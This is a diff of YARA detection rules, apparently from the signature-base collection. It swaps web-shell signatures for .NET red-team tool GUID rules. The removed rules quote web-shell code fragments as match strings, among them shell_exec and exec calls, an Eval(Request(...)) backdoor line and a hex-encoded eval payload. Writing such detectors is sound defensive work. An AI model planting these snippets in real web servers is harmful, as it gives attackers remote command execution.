-rule SIGNATURE_BASE_Webshell_C99_Locus7S_C99_W4Cking_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpreg : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3127-L3156"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d89b07b0-bb29-5c77-888b-322e439b4c82"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/jnqpblc/SharpReg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4156-L4169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4afadac41e729f77711eb3ea3ee8f6e8ce61e19294e90db024e5334e214d9647"
-		score = 70
+		logic_hash = "d483e590310d69df4a0267ae3091067deb8698526dd8069862a944a6b1faed05"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
-		hash1 = "9c34adbc8fd8d908cbb341734830f971"
-		hash2 = "ef43fef943e9df90ddb6257950b3538f"
-		hash3 = "ae025c886fbe7f9ed159f49593674832"
-		hash4 = "911195a9b7c010f61b66439d9048f400"
-		hash5 = "697dae78c040150daff7db751fc0c03c"
-		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
-		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
-		hash12 = "41af6fd253648885c7ad2ed524e0692d"
-		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s1 = "$res = @shell_exec($cfe);" fullword
-		$s8 = "$res = @ob_get_contents();" fullword
-		$s9 = "@exec($cfe,$res);" fullword
+		$typelibguid0lo = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Ma2_Download
+rule SIGNATURE_BASE_HKTL_NET_GUID_Memevm : FILE
 {
 	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3157-L3178"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c98d84d5-4b0a-53df-b8d4-0b360930eb0c"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/TobitoFatitoRE/MemeVM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4171-L4186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b8bb6ca2eb146f8c170d629612ba12d4663445d443b681f2859af25d50ab6fe"
-		score = 70
+		logic_hash = "88f4b9d0b3050ad676a54a58ea8f6a02fb07041db404c9d84f25fdda6ff3df4a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
-		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
-		$s2 = "private static String tempdir = \".\";" fullword
-		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
+		$typelibguid0lo = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii wide
+		$typelibguid1lo = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii wide
+		$typelibguid2lo = "14d5d12e-9a32-4516-904e-df3393626317" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdir : FILE
 {
 	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3179-L3200"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f64ed564-d198-59e8-9abe-b2814b95c85f"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/jnqpblc/SharpDir"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4188-L4201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd01bb059d741fedaee17d46355c7cd8a845d714b20ae37db36424544b954d2f"
-		score = 70
+		logic_hash = "a98ee516931d08d82fb28749130be7d8007a8ac2935fd6007bae27820e216a92"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash4 = "655722eaa6c646437c8ae93daac46ae0"
 
 	strings:
-		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
-		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
-		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
-		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+		$typelibguid0lo = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Kartal_R57
+rule SIGNATURE_BASE_HKTL_NET_GUID_Atyourservice : FILE
 {
 	meta:
-		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3201-L3219"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3077dd0c-6936-5340-8da9-e8643de4d864"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/mitchmoser/AtYourService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4203-L4216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fd849f76f8348ee57a9c96eed91c8cac416fdc45a08c93e93ebc952375de27a3"
-		score = 70
+		logic_hash = "c15c466ff048af2818cf9b59794786ba6d11f70d7dee5ef5ee5f050a9b547790"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae025c886fbe7f9ed159f49593674832"
-		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
 
 	strings:
-		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
-		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
-		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
+		$typelibguid0lo = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Con2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lockless : FILE
 {
 	meta:
-		description = "Web shells - generated from file con2.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3221-L3235"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f9b31f57-d721-5b6c-be63-b8309cba788a"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/LockLess"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4218-L4231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d3584159ab299d546bd77c9654932ae3"
-		logic_hash = "c681b04a1ee4d6af3275b6d772ef35f8bc888a5fcaf3b84f29f77c264e8ad9b9"
-		score = 70
+		logic_hash = "57e09a929cc90c399068fb00ddd00c462df34d285d51273aedf27220a0647a38"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
-		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
+		$typelibguid0lo = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Make2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Easynet : FILE
 {
 	meta:
-		description = "Web shells - generated from file make2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3236-L3249"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8408a057-4910-5d7b-80bc-78df17c95bf7"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/TheWover/EasyNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4233-L4248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9af195491101e0816a263c106e4c145e"
-		logic_hash = "7c94c925b5fd7fbc37428c21a9ea3c5a73f4fa0a20a1f5d03f0d5a990bd6f45a"
-		score = 50
+		logic_hash = "75f69a226391fc6da86c6995295addbefe0a7e1a9ff972f211174a845816061f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
+		$typelibguid0lo = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii wide
+		$typelibguid1lo = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii wide
+		$typelibguid2lo = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Aaa
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbyebear : FILE
 {
 	meta:
-		description = "Web shells - generated from file aaa.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3250-L3265"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4a7f2514-2519-5fd5-9d17-110a67f829e7"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4250-L4264"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "68483788ab171a155db5266310c852b2"
-		logic_hash = "3c5b9dd86dc790b03a8540b2fb3a717c5ad17d34f366a319faa127479387eed9"
-		score = 70
+		logic_hash = "f39d756b6e0b8f9037d862bdfa9b14fc2eeddf0eafad805892b8b02410f78c63"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
-		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
-		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
+		$typelibguid0lo = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii wide
+		$typelibguid1lo = "3e82f538-6336-4fff-aeec-e774676205da" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Expdoor_Com_ASP
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphide : FILE
 {
 	meta:
-		description = "Web shells - generated from file Expdoor.com ASP.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3266-L3283"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "928e00c1-549a-58f5-9e7e-982a4319691a"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/outflanknl/SharpHide"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4266-L4279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "caef01bb8906d909f24d1fa109ea18a7"
-		logic_hash = "838edb9d718b5e1a8be155c4569b4a291b37337e71b435c2b1cd6bcaa53c0dea"
-		score = 70
+		logic_hash = "62264aafeafe98ce23e7c03ce75be750ab95d77d3523c0748bdcb2f50d0c04cb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "\">www.Expdoor.com</a>" fullword
-		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
-		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
-		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
-		$s16 = "<TITLE>Expdoor.com ASP" fullword
+		$typelibguid0lo = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsvc : FILE
 {
 	meta:
-		description = "Web shells - generated from file php2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3284-L3297"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cbc1d7d4-f3b4-5d02-84ae-621398cb7b51"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/jnqpblc/SharpSvc"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4281-L4294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fbf2e76e6f897f6f42b896c855069276"
-		logic_hash = "0350df076a25af77fbd8d5db2b38438a10cd5b9237b23b2f64c6360607b41982"
-		score = 70
+		logic_hash = "cb91c4cd858a49f5cf437d3d1fb173afa7fe44442d41ea8533797007003c35d4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
+		$typelibguid0lo = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Bypass_Iisuser_P
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcrasheventlog : FILE
 {
 	meta:
-		description = "Web shells - generated from file bypass-iisuser-p.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3298-L3311"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "85d31989-ad96-5005-a747-8a19a67fdd80"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/slyd0g/SharpCrashEventLog"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4296-L4309"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "924d294400a64fa888a79316fb3ccd90"
-		logic_hash = "60d0609291e5def26ce949c903ac767db4157b4f9cf4eee315c69ee7a8d8e77b"
-		score = 70
+		logic_hash = "f53cfa44168a3ed81370ebb61153b6fab521801ffef33ace23aa8ed3376688eb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
+		$typelibguid0lo = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Sig_404Super
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript_Languagemodebreakout : FILE
 {
 	meta:
-		description = "Web shells - generated from file 404super.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3312-L3330"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8c8cf79f-8e69-5293-b27a-1f8593061627"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4311-L4324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7ed63176226f83d36dce47ce82507b28"
-		logic_hash = "01ecffc6bca2acf1ea4f4d965f3513f7b08ee3d5abbda29d53081f2931ecf9e9"
-		score = 70
+		logic_hash = "de83b8138f49fe6aced5d9ebe77104f780496630f35550fbf0244429a2cb4917"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
-		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
-		$s7 = "//http://require.duapp.com/session.php" fullword
-		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
-		$s12 = "//define('pass','123456');" fullword
-		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
+		$typelibguid0lo = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_JSP
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpermission : FILE
 {
 	meta:
-		description = "Web shells - generated from file JSP.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3331-L3346"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d5027f51-f3ca-53cd-96d7-c355b5c2e6fa"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/mitchmoser/SharPermission"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4326-L4339"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
-		logic_hash = "bcb2f5d16ff3cc1454bf4653defe037e02a9228a5b7cf7428b1a577f4207c3c8"
-		score = 70
+		logic_hash = "061a7ba9fb838b59a96e480356309af0c4b02d3ba3f2e83944c8dd98b739f6b6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
-		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
-		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
+		$typelibguid0lo = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshell_123
+rule SIGNATURE_BASE_HKTL_NET_GUID_Registrystrikesback : FILE
 {
 	meta:
-		description = "Web shells - generated from file webshell-123.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2023-01-27"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3347-L3364"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1577ed24-0e17-54f9-bc29-bb209acf9645"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4341-L4354"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2782bb170acaed3829ea9a04f0ac7218"
-		logic_hash = "1caccadf2bd7d265f9b5026c82acc31ade95313d57382651004db8b5e361312d"
-		score = 70
+		logic_hash = "1e2aa9ddf6cbf35cb636e35c18159468ec98eb2c30078c2a1a2a635d14599959"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "// Web Shell!!" fullword
-		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
-		$s3 = "$default_charset = \"UTF-8\";" fullword
-		$s4 = "// url:http://www.weigongkai.com/shell/"
+		$typelibguid0lo = "90ebd469-d780-4431-9bd8-014b00057665" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Dev_Core
+rule SIGNATURE_BASE_HKTL_NET_GUID_Clonevault : FILE
 {
 	meta:
-		description = "Web shells - generated from file dev_core.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3365-L3383"
+		description = "Detects .NET red/black-team tools via typelibguid"
